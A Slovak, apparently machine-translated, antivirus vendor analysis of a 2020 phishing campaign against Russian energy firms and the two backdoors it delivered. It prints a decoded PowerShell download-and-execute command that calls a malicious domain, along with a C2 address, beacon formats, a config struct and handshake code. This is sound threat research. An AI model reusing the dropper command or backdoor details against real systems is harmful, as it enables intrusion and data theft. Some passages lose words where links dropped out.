Naše skúsenosti s vyšetrovaním incidentov počítačovej bezpečnosti ukazujú, že e-mail je stále jedným z najbežnejších kanálov, ktoré útočníci používajú na prvotné prenikanie do napadnutých sieťových infraštruktúr. Jedna neopatrná akcia s podozrivým (alebo nie až tak podozrivým) listom sa stáva vstupným bodom pre ďalšiu infekciu, a preto kyberzločinci aktívne využívajú metódy sociálneho inžinierstva, aj keď s rôznou mierou úspechu.
V tomto príspevku chceme hovoriť o našom nedávnom vyšetrovaní spamovej kampane zameranej na množstvo podnikov v ruskom palivovom a energetickom komplexe. Všetky útoky prebiehali podľa rovnakého scenára s použitím falošných e-mailov a zdá sa, že nikto nevenoval veľa úsilia textovému obsahu týchto e-mailov.
Spravodajská služba
Všetko sa to začalo koncom apríla 2020, keď analytici vírusu Doctor Web odhalili spamovú kampaň, v ktorej hackeri posielali aktualizovaný telefónny zoznam zamestnancom viacerých podnikov v ruskom palivovom a energetickom komplexe. Samozrejme, nešlo o jednoduchý prejav záujmu, keďže adresár nebol skutočný a dokumenty .docx stiahli dva obrázky zo vzdialených zdrojov.
Jeden z nich bol stiahnutý do počítača používateľa zo servera news[.]zannews[.]com. Je pozoruhodné, že názov domény je podobný doméne protikorupčného mediálneho centra Kazachstanu - zannews[.]kz. Na druhej strane použitá doména okamžite pripomínala inú kampaň z roku 2015 známu ako TOPNEWS, ktorá používala zadné vrátka ICEFOG a mala trójske kontrolné domény s podreťazcom „novinky“ v názve. Ďalšou zaujímavou funkciou bolo, že pri odosielaní e-mailov rôznym príjemcom používali požiadavky na stiahnutie obrázka buď odlišné parametre požiadavky, alebo jedinečné názvy obrázkov.
Domnievame sa, že to bolo urobené s cieľom zhromaždiť informácie na identifikáciu „spoľahlivého“ adresáta, ktorý by potom zaručene otvoril list v správnom čase. Na stiahnutie obrazu z druhého servera sa použil protokol SMB, čo bolo možné vykonať na zhromaždenie hashov NetNTLM z počítačov zamestnancov, ktorí otvorili prijatý dokument.
A tu je samotný list s falošným adresárom:
V júni tohto roku začali hackeri na nahrávanie obrázkov používať nový názov domény sports[.]manhajnews[.]com. Analýza ukázala, že subdomény manhajnews[.]com sa používajú v spamových správach minimálne od septembra 2019. Jedným z cieľov tejto kampane bola veľká ruská univerzita.
Do júna tiež organizátori útoku prišli s novým textom pre svoje listy: tentoraz dokument obsahoval informácie o vývoji priemyslu. Text listu jasne naznačoval, že jeho autor buď nebol rodeným hovorcom ruštiny, alebo o sebe úmyselne vytváral taký dojem. Žiaľ, myšlienky rozvoja priemyslu sa ako vždy ukázali byť len zásterkou – dokument opäť stiahol dva obrázky, zatiaľ čo server sa zmenil na download[.]inklingpaper[.]com.
Ďalšia inovácia nasledovala v júli. V snahe obísť detekciu škodlivých dokumentov antivírusovými programami začali útočníci používať dokumenty Microsoft Word zašifrované heslom. Útočníci sa zároveň rozhodli použiť klasickú techniku sociálneho inžinierstva – oznamovanie odmeny.
Text výzvy bol opäť napísaný rovnakým štýlom, čo u adresáta vzbudilo dodatočné podozrenie. Nezmenil sa ani server na sťahovanie obrázka.
Upozorňujeme, že vo všetkých prípadoch boli na odosielanie listov použité elektronické schránky registrované na doménach mail[.]ru a yandex[.]ru.
útok
Začiatkom septembra 2020 nastal čas konať. Naši vírusoví analytici zaznamenali novú vlnu útokov, pri ktorých útočníci opäť posielali listy pod zámienkou aktualizácie telefónneho zoznamu. Tentoraz však príloha obsahovala škodlivé makro.
Pri otvorení priloženého dokumentu makro vytvorilo dva súbory:
- Skript VBS %APPDATA%microsoftwindowsstart menuprogramsstartupadadoba.vbs, ktorý bol určený na spustenie dávkového súboru;
- Samotný dávkový súbor %APPDATA%configstest.bat, ktorý bol zahmlený.
Podstata jeho práce spočíva v spustení shellu Powershell s určitými parametrami. Parametre odovzdané do shellu sú dekódované do príkazov:
$o = [activator]::CreateInstance([type]::GetTypeFromCLSID("F5078F35-C551-11D3-89B9-0000F81FE221"));$o.Open("GET", "http://newsinfo.newss.nl/nissenlist/johnlists.html", $False);$o.Send(); IEX $o.responseText;Ako vyplýva z prezentovaných príkazov, doména, z ktorej sa sťahuje payload, je opäť maskovaná ako spravodajská stránka. Jednoduchý , ktorého jedinou úlohou je prijať shell kód z príkazového a riadiaceho servera a spustiť ho. Podarilo sa nám identifikovať dva typy zadných vrátok, ktoré je možné nainštalovať do počítača obete.
BackDoor.Siggen2.3238
Prvým je BackDoor.Siggen2.3238 — naši špecialisti sa predtým nestretli a o tomto programe neboli ani zmienky od iných dodávateľov antivírusov.
Tento program je backdoor napísaný v C++ a beží na 32-bitových operačných systémoch Windows.
BackDoor.Siggen2.3238 je schopný komunikovať so serverom pre správu pomocou dvoch protokolov: HTTP a HTTPS. Testovaná vzorka používa protokol HTTPS. V požiadavkách na server sa používa nasledujúci User-Agent:
Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; SE)
V tomto prípade sú všetky požiadavky dodávané s nasledujúcou sadou parametrov:
%s;type=%s;length=%s;realdata=%send
kde každý riadok %s je zodpovedajúcim spôsobom nahradený:
- ID infikovaného počítača,
- typ odosielanej žiadosti,
- dĺžka údajov v poli skutočných údajov,
- dát.
Vo fáze zhromažďovania informácií o infikovanom systéme backdoor generuje riadok ako:
lan=%s;cmpname=%s;username=%s;version=%s;
kde lan je IP adresa infikovaného počítača, cmpname je názov počítača, username je meno používateľa, verzia je riadok 0.0.4.03.
Tieto informácie s identifikátorom sysinfo sa odosielajú prostredníctvom požiadavky POST na riadiaci server na adrese https[:]//31.214[.]157.14/log.txt. Ak v odpovedi BackDoor.Siggen2.3238 prijme signál SRDCE, pripojenie sa považuje za úspešné a zadné vrátka začnú hlavný cyklus komunikácie so serverom.
Podrobnejší popis princípov fungovania BackDoor.Siggen2.3238 je v našom .
BackDoor.Whitebird.23
Druhým programom je modifikácia backdooru BackDoor.Whitebird, ktorý je nám známy už z incidentu s vládnou agentúrou v Kazachstane. Táto verzia je napísaná v C++ a je navrhnutá tak, aby fungovala na 32-bitových aj 64-bitových operačných systémoch Windows.
Ako väčšina programov tohto typu, BackDoor.Whitebird.23 navrhnutý na vytvorenie šifrovaného spojenia s riadiacim serverom a neoprávnenú kontrolu infikovaného počítača. Inštalované do napadnutého systému pomocou kvapkadla .
Vzorka, ktorú sme skúmali, bola škodlivá knižnica s dvoma exportmi:
- Google Play
- Test.
Na začiatku svojej práce dešifruje konfiguráciu napevno zapojenú do tela backdoor pomocou algoritmu založeného na operácii XOR s byte 0x99. Konfigurácia vyzerá takto:
struct st_cfg
{
_DWORD dword0;
wchar_t campaign[64];
wchar_t cnc_addr[256];
_DWORD cnc_port;
wchar_t cnc_addr2[100];
wchar_t cnc_addr3[100];
_BYTE working_hours[1440];
wchar_t proxy_domain[50];
_DWORD proxy_port;
_DWORD proxy_type;
_DWORD use_proxy;
_BYTE proxy_login[50];
_BYTE proxy_password[50];
_BYTE gapa8c[256];
};
Aby sa zabezpečila jeho stála prevádzka, zadné dvierka menia hodnotu uvedenú v poli pracovný čas konfigurácie. Pole obsahuje 1440 bajtov, ktoré nadobúdajú hodnoty 0 alebo 1 a predstavujú každú minútu každej hodiny dňa. Vytvorí samostatné vlákno pre každé sieťové rozhranie, ktoré počúva rozhranie a hľadá autorizačné pakety na proxy serveri z infikovaného počítača. Keď je takýto paket zistený, backdoor pridá informácie o proxy serveri do svojho zoznamu. Okrem toho kontroluje prítomnosť proxy cez WinAPI InternetQueryOptionW.
Program skontroluje aktuálnu minútu a hodinu a porovná ich s údajmi v poli pracovný čas konfigurácie. Ak hodnota pre príslušnú minútu dňa nie je nula, potom sa vytvorí spojenie s riadiacim serverom.
Vytvorenie spojenia so serverom simuluje vytvorenie spojenia pomocou protokolu TLS verzie 1.0 medzi klientom a serverom. Telo zadného vrátka obsahuje dva nárazníky.
Prvá vyrovnávacia pamäť obsahuje paket TLS 1.0 Client Hello.
Druhá vyrovnávacia pamäť obsahuje pakety TLS 1.0 Client Key Exchange s dĺžkou kľúča 0x100 bajtov, Change Cipher Spec, Encrypted Handshake Message.
Pri odosielaní paketu Client Hello zapíše backdoor 4 bajty aktuálneho času a 28 bajtov pseudonáhodných údajov do poľa Client Random, vypočítané takto:
v3 = time(0);
t = (v3 >> 8 >> 16) + ((((((unsigned __int8)v3 << 8) + BYTE1(v3)) << 8) + BYTE2(v3)) << 8);
for ( i = 0; i < 28; i += 4 )
*(_DWORD *)&clientrnd[i] = t + *(_DWORD *)&cnc_addr[i / 4];
for ( j = 0; j < 28; ++j )
clientrnd[j] ^= 7 * (_BYTE)j;
Prijatý paket sa odošle na riadiaci server. Odpoveď (paket Server Hello) skontroluje:
- súlad s protokolom TLS verzie 1.0;
- korešpondencia časovej pečiatky (prvé 4 bajty poľa Random Data packet) špecifikovaného klientom s časovou pečiatkou špecifikovanou serverom;
- zhoda prvých 4 bajtov po časovej pečiatke v poli Random Data klienta a servera.
V prípade uvedených zhôd backdoor pripraví paket výmeny klientskeho kľúča. Za týmto účelom upraví verejný kľúč v balíku Client Key Exchange, ako aj Encryption IV a Encryption Data v balíku Encrypted Handshake Message.
Backdoor potom prijme paket z príkazového a riadiaceho servera, skontroluje, či je verzia protokolu TLS 1.0, a potom prijme ďalších 54 bajtov (telo paketu). Tým sa dokončí nastavenie pripojenia.
Podrobnejší popis princípov fungovania BackDoor.Whitebird.23 je v našom .
Záver a závery
Analýza dokumentov, malvéru a použitej infraštruktúry nám umožňuje s istotou povedať, že útok pripravila jedna z čínskych skupín APT. Vzhľadom na funkčnosť zadných vrátok, ktoré sú nainštalované na počítačoch obetí v prípade úspešného útoku, infekcia vedie minimálne k odcudzeniu dôverných informácií z počítačov napadnutých organizácií.
Okrem toho je veľmi pravdepodobným scenárom inštalácia špecializovaných trójskych koní na lokálne servery so špeciálnou funkciou. Môžu to byť radiče domény, poštové servery, internetové brány atď. Ako sme mohli vidieť v príklade , takéto servery sú obzvlášť zaujímavé pre útočníkov z rôznych dôvodov.
Zdroj: hab.com